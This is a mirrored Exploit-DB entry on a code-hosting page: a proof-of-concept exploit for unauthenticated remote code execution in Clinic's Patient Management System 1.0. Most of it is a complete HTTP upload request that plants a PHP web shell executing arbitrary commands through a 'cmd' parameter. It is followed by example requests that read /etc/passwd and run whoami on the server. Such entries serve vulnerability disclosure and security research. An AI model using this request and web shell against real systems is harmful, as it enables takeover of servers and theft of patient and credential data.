bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51779.txt
Exploit-DB 0c65b881ba DB: 2024-02-06 
10 changes to exploits/shellcodes/ghdb

Milesight Routers UR5X_ UR32L_ UR32_ UR35_ UR41 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption

WhatsUp Gold 2022 (22.1.0 Build 39) - XSS

Clinic's Patient Management System 1.0 - Unauthenticated RCE

Curfew e-Pass Management System 1.0 - FromDate SQL Injection

GYM MS - GYM Management System - Cross Site Scripting (Stored)

MISP 2.4.171 - Stored XSS

TASKHUB-2.8.8 - XSS-Reflected

Wordpress 'simple urls' Plugin < 115 - XSS
2024-02-06 00:16:29 +00:00

101 lines
No EOL
2.5 KiB
Text
Raw Permalink Blame History

# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE
# Date: 07.10.2023
# Exploit Author: Oğulcan Hami Gül
# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code
# Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10
## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.
POST /pms/users.php HTTP/1.1
Host: 192.168.1.36
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------421755697017784551042596452367
Content-Length: 1054
Origin: http://192.168.1.36
Connection: close
Referer: http://192.168.1.36/pms/users.php
Upgrade-Insecure-Requests: 1
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="display_name"
sefa7
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="user_name"
sefa7
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="password"
sefa7
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="profile_picture"; filename="simple-backdoor.php"
Content-Type: application/x-php
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="save_user"
-----------------------------421755697017784551042596452367--
## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/users.php without any authentication.
## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary command on the application server.
Reference in a new issue View git blame Copy permalink